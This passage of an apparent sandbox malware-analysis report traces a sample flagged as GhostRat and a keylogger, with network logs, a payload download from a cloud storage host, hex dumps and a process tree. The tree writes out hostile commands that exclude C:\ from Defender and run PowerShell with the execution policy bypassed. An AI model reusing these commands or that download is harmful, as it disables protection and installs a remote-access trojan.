                                                                                                                          Jan 4, 2025 05:38:53.075167894 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075201035 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075218916 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075228930 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075239897 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075249910 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075270891 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075305939 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:53.075335979 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075346947 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:53.075359106 CET1909149743118.107.44.219192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 05:38:21.068672895 CET | 63927 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 05:38:21.259260893 CET | 53 | 63927 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 05:38:21.068672895 CET | 192.168.2.4 | 1.1.1.1 | 0x283b | Standard query (0) | bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 05:38:21.259260893 CET | 1.1.1.1 | 192.168.2.4 | 0x283b | No error (0) | bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com |  | 47.79.48.211 | A (IP address) | IN (0x0001) | false
                                                                                                                          • bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 47.79.48.211 | 443 | 7344 | C:\Users\user\Desktop\HGwpjJUqhW.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-04 04:38:22 UTC | 155 | OUT | GET /pc_yyb_2700200680_installer.exe HTTP/1.1
User-Agent: URLDownloader
Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
Cache-Control: no-cache
2025-01-04 04:38:23 UTC | 561 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: AliyunOSS
                                                                                                                          Date: Sat, 04 Jan 2025 04:38:23 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 7460336
                                                                                                                          Connection: close
                                                                                                                          x-oss-request-id: 6778BB3F5F471E3932D0E35D
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          ETag: "9DEE6F9C41488F78CC867C028EA58199"
                                                                                                                          Last-Modified: Tue, 31 Dec 2024 04:19:08 GMT
                                                                                                                          x-oss-object-type: Normal
                                                                                                                          x-oss-hash-crc64ecma: 282137398408292773
                                                                                                                          x-oss-storage-class: Standard
                                                                                                                          x-oss-ec: 0048-00000113
                                                                                                                          Content-Disposition: attachment
                                                                                                                          x-oss-force-download: true
                                                                                                                          Content-MD5: ne5vnEFIj3jMhnwCjqWBmQ==
                                                                                                                          x-oss-server-time: 11
                                                                                                                          Data Ascii: LNLV(L^8LfLT$ L\$(Ld$0HL$8}:H@A_A^A]A\][_^HIH4IH<I!L$H?OH?NH!H?HH?H!HHH>H!HH1HH=H1HH1H1MH$M1LL$ML
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: 44 0f 29 b4 24 90 00 00 00 44 0f 29 bc 24 a0 00 00 00 f3 0f 6f 07 e8 76 02 00 00 e8 51 f7 ff ff f3 0f 7f 06 0f 28 74 24 10 0f 28 7c 24 20 44 0f 28 44 24 30 44 0f 28 4c 24 40 44 0f 28 54 24 50 44 0f 28 5c 24 60 44 0f 28 64 24 70 44 0f 28 ac 24 80 00 00 00 44 0f 28 b4 24 90 00 00 00 44 0f 28 bc 24 a0 00 00 00 48 8d a4 24 b8 00 00 00 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 90 90 90 90 90 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 48 8d a4 24 48 ff ff ff 0f 29 74 24 10 0f 29 7c 24 20 44 0f 29 44 24 30 44 0f 29 4c 24 40 44 0f 29 54 24 50 44 0f 29 5c 24 60 44 0f 29 64 24 70 44 0f 29 ac 24 80 00 00 00 44 0f 29 b4 24 90 00 00 00 44 0f 29 bc 24 a0 00 00 00 f3 0f 6f 07 e8 a6 01 00 00 e8 e1 f7 ff ff f3 0f 7f 06 0f 28 74 24 10 0f 28 7c 24 20 44
                                                                                                                          Data Ascii: D)$D)$ovQ(t$(|$ D(D$0D(L$@D(T$PD(\$`D(d$pD($D($D($H$H|$Ht$H|$Ht$HHHLH$H)t$)|$ D)D$0D)L$@D)T$PD)\$`D)d$pD)$D)$D)$o(t$(|$ D
                                                                                                                          2025-01-04 04:38:23 UTC16384INData Raw: cf 48 89 d6 4c 89 c2 4c 89 c9 4c 8b 44 24 28 48 8d 64 24 a8 0f 29 34 24 0f 29 7c 24 10 44 0f 29 44 24 20 44 0f 29 4c 24 30 48 83 e2 f0 0f 84 42 05 00 00 8b 81 f0 00 00 00 0f 10 01 49 89 cb 41 89 c2 45 85 c0 0f 84 46 02 00 00 48 81 fa 80 00 00 00 0f 82 e0 00 00 00 f3 0f 6f 17 f3 0f 6f 5f 10 f3 0f 6f 67 20 f3 0f 6f 6f 30 f3 0f 6f 77 40 f3 0f 6f 7f 50 f3 44 0f 6f 47 60 f3 44 0f 6f 4f 70 48 8d bf 80 00 00 00 48 81 ea 80 00 00 00 eb 5e 0f 11 16 4c 89 d9 f3 0f 6f 17 44 89 d0 0f 11 5e 10 f3 0f 6f 5f 10 0f 11 66 20 f3 0f 6f 67 20 0f 11 6e 30 f3 0f 6f 6f 30 0f 11 76 40 f3 0f 6f 77 40 0f 11 7e 50 f3 0f 6f 7f 50 44 0f 11 46 60 f3 44 0f 6f 47 60 44 0f 11 4e 70 48 8d b6 80 00 00 00 f3 44 0f 6f 4f 70 48 8d bf 80 00 00 00 e8 dd fc ff ff 48 81 ea 80 00 00 00 73 94 0f 11
                                                                                                                          Data Ascii: HLLLD$(Hd$)4$)|$D)D$ D)L$0HBIAEFHoo_og oo0ow@oPDoG`DoOpHH^LoD^o_f og n0oo0v@ow@~PoPDF`DoG`DNpHDoOpHHs



                                                                                                                          Target ID:0
                                                                                                                          Start time:23:38:13
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\HGwpjJUqhW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\HGwpjJUqhW.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5 hash:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1671781833.00000000006F9000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2089018871.0000000000403000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1671468672.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:23:38:16
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:23:38:17
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                          File size:496'640 bytes
                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:5
                                                                                                                          Start time:23:38:19
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:5'289'240 bytes
                                                                                                                          MD5 hash:C4503D77F7A1BD9AD2B198D01E69BC43
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4137601015.0000000003400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2968963191.000000000455A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2061027925.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2138397079.0000000004691000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927936986.0000000004651000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927936986.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4139867488.0000000004950000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2927191607.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 8%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:6
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:23:38:20
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x320000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:9
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:11
                                                                                                                          Start time:23:38:21
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:15
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:16
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                          Imagebase:0x240000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:17
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:18
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:19
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Target ID:20
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:3.6%
                                                                                                                            Total number of Nodes:1374
                                                                                                                            Total number of Limit Nodes:7
Concurrency::task_continuation_context::task_continuation_context 10884->10886 10890 10004820 10884->10890 10893 10004990 10886->10893 10889->10884 10897 10004a50 10890->10897 10894 1000499f 10893->10894 10896 10004801 10893->10896 10909 10002fb0 10894->10909 10896->10862 10900 10004a90 10897->10900 10905 10004b30 10900->10905 10903 10004af0 allocator 6 API calls 10904 10004845 10903->10904 10904->10886 10906 10004aa0 10905->10906 10907 10004b4a 10905->10907 10906->10903 10908 100012c0 allocator _CxxThrowException 10907->10908 10908->10906 10910 10002fc7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10909->10910 10912 10002ff8 10910->10912 10913 100037c0 10910->10913 10912->10896 10916 10003a50 10913->10916 10917 10004340 allocator _invalid_parameter_noinfo_noreturn 10916->10917 10918 100037eb 10917->10918 10918->10912 10919->10873 10921 10016302 _register_onexit_function 10920->10921 10922 100162fb _crt_atexit 10920->10922 10923 100015cc 10921->10923 10922->10923 10923->10880 10925 10005798 10924->10925 10926 10002da0 8 API calls 10925->10926 10927 100057ae 10926->10927 10928 10002e20 8 API calls 10927->10928 10929 100057c5 _Smanip _Error_objects 10928->10929 10930 10012640 9 API calls 10929->10930 10931 10005e28 _Smanip _Error_objects 10930->10931 10932 10012640 9 API calls 10931->10932 10933 1000a1cb 10932->10933 10934 10005400 9 API calls 10933->10934 10935 1000a1e2 10934->10935 10936 10005400 9 API calls 10935->10936 10937 1000a1fc _Error_objects 10936->10937 11204 10004fe0 10937->11204 10940 10002cd0 _invalid_parameter_noinfo_noreturn 10941 1000a253 10940->10941 10942 10002cb0 _invalid_parameter_noinfo_noreturn 10941->10942 10943 1000a25e 10942->10943 10944 10004fe0 17 API calls 10943->10944 10945 1000a272 10944->10945 10946 10002cd0 _invalid_parameter_noinfo_noreturn 10945->10946 10947 1000a28d 10946->10947 10948 10002cb0 _invalid_parameter_noinfo_noreturn 10947->10948 10949 1000a298 GetTempPathA 10948->10949 10951 10002da0 
8 API calls 10949->10951 10952 1000a373 _Smanip _Error_objects 10951->10952 10953 10012640 9 API calls 10952->10953 10954 1000a3fc 10953->10954 10955 10005400 9 API calls 10954->10955 10956 1000a413 10955->10956 10957 10012620 _invalid_parameter_noinfo_noreturn 10956->10957 10958 1000a425 10957->10958 10959 10002e20 8 API calls 10958->10959 10960 1000a44b 10959->10960 11228 10005250 10960->11228 10962 1000a457 _Smanip _Error_objects 10963 10012640 9 API calls 10962->10963 10964 1000a50d 10963->10964 10965 10005400 9 API calls 10964->10965 10966 1000a524 10965->10966 11235 100138d0 10966->11235 10968 1000a557 10969 10002cb0 _invalid_parameter_noinfo_noreturn 10968->10969 10970 1000a569 10969->10970 10971 10012620 _invalid_parameter_noinfo_noreturn 10970->10971 10972 1000a578 10971->10972 11238 10005520 DeleteFileA 10972->11238 10974 1000a58a 10975 10002da0 8 API calls 10974->10975 10976 1000a5a4 10975->10976 11240 10005300 10976->11240 10979 10002cb0 _invalid_parameter_noinfo_noreturn 10980 1000a5cd Sleep 10979->10980 10981 1000a5e5 10980->10981 10982 10002da0 8 API calls 10981->10982 10983 1000a5f1 _Smanip _Error_objects 10982->10983 10984 10012640 9 API calls 10983->10984 10985 1000a666 10984->10985 10986 10005400 9 API calls 10985->10986 10987 1000a67d 10986->10987 10988 10002e20 8 API calls 10987->10988 10989 1000a6c7 10988->10989 10990 10005250 13 API calls 10989->10990 10991 1000a6d3 10990->10991 10992 10002cb0 _invalid_parameter_noinfo_noreturn 10991->10992 10993 1000a6eb 10992->10993 10994 10012620 _invalid_parameter_noinfo_noreturn 10993->10994 10995 1000a6fa 10994->10995 10996 10002cb0 _invalid_parameter_noinfo_noreturn 10995->10996 10997 1000a709 10996->10997 10998 10002da0 8 API calls 10997->10998 10999 1000a721 _Smanip _Error_objects 10998->10999 11000 10012640 9 API calls 10999->11000 11001 1000a79a 11000->11001 11002 10005400 9 API calls 11001->11002 11003 1000a7b1 11002->11003 11004 10002e20 8 API calls 11003->11004 11005 1000a7fb 11004->11005 11006 
10005250 13 API calls 11005->11006 11007 1000a807 11006->11007 11008 10002cd0 _invalid_parameter_noinfo_noreturn 11007->11008 11009 1000a82e 11008->11009 11010 10002cb0 _invalid_parameter_noinfo_noreturn 11009->11010 11011 1000a839 11010->11011 11012 10002cb0 _invalid_parameter_noinfo_noreturn 11011->11012 11013 1000a848 11012->11013 11014 10012620 _invalid_parameter_noinfo_noreturn 11013->11014 11015 1000a857 11014->11015 11016 10002cb0 _invalid_parameter_noinfo_noreturn 11015->11016 11017 1000a866 11016->11017 11251 100139a0 11017->11251 11021 1000a8ad 11022 10013a30 9 API calls 11021->11022 11023 1000a8db 11022->11023 11024 10013a30 9 API calls 11023->11024 11025 1000a909 11024->11025 11026 10013a30 9 API calls 11025->11026 11027 1000a937 11026->11027 11028 10013a30 9 API calls 11027->11028 11029 1000a965 11028->11029 11030 10013a30 9 API calls 11029->11030 11031 1000a993 11030->11031 11032 10013a30 9 API calls 11031->11032 11033 1000a9c1 11032->11033 11034 10013a30 9 API calls 11033->11034 11035 1000a9ef 11034->11035 11036 10013a30 9 API calls 11035->11036 11037 1000aa1d 11036->11037 11038 10013a30 9 API calls 11037->11038 11039 1000aa4b 11038->11039 11040 10013a30 9 API calls 11039->11040 11041 1000aa79 11040->11041 11042 10002cb0 _invalid_parameter_noinfo_noreturn 11041->11042 11043 1000aa8b 11042->11043 11044 10002cb0 _invalid_parameter_noinfo_noreturn 11043->11044 11045 1000aa9a 11044->11045 11046 10002cb0 _invalid_parameter_noinfo_noreturn 11045->11046 11047 1000aaa9 11046->11047 11048 10002cb0 _invalid_parameter_noinfo_noreturn 11047->11048 11049 1000aab8 11048->11049 11050 10002cb0 _invalid_parameter_noinfo_noreturn 11049->11050 11051 1000aac7 11050->11051 11052 10002cb0 _invalid_parameter_noinfo_noreturn 11051->11052 11053 1000aad6 11052->11053 11054 10002cb0 _invalid_parameter_noinfo_noreturn 11053->11054 11055 1000aae5 11054->11055 11056 10002cb0 _invalid_parameter_noinfo_noreturn 11055->11056 11057 1000aaf4 11056->11057 11058 10002cb0 
